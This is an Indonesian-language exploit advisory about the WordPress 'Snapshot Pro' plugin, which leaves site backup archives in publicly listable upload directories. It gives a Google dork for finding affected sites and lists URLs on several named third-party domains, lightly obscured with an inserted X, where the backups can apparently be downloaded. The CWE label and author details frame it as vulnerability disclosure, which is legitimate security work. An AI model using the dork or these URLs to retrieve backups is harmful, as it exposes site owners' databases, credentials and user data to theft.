WordPress 'Snapshot Pro' Plugin Paparan Backup File untuk Kontrol sah

# WordPress 'Snapshot Pro' Plugin Paparan Backup File untuk Kontrol sah
# CWE: cwe-530
# Risiko: Tinggi
# Penulis: Hugo Santiago dos Santos
# Hubungi: hugo.s@linuxmail.org
# Tanggal: 15/05/2015
# Penjual Homepage: https://premium.wpmudev.org/project/snapshot/
# Google Dork: "Index of" + / wp-content / uploads / snapshots /

# PoC:

http://trapshootingonXline.com/wp-content/uploads/snapshots/"RANDOM DIR "/" NAMA CADANGAN "
http://trapshootingoXnline.com/wp-content/uploads/snapshots/
http://forsythchurcXhofchrist.net/wp-content/uploads/snapshots/
http://www.bardoXlatry.com/wp-content/uploads/snapshots/4ljtmn0hfg0kvmifobvrfdsdv2/

# Xploit:

Setelah menggunakan Dork Google ("Index of" + / wp-content / uploads / snapshots /), kita dapat mengakses direktori backup secara bebas ("/ wp-content / uploads / snapshots /"), dan semua backup akan berada di sana untuk mengunduh (Compress .tar.gz).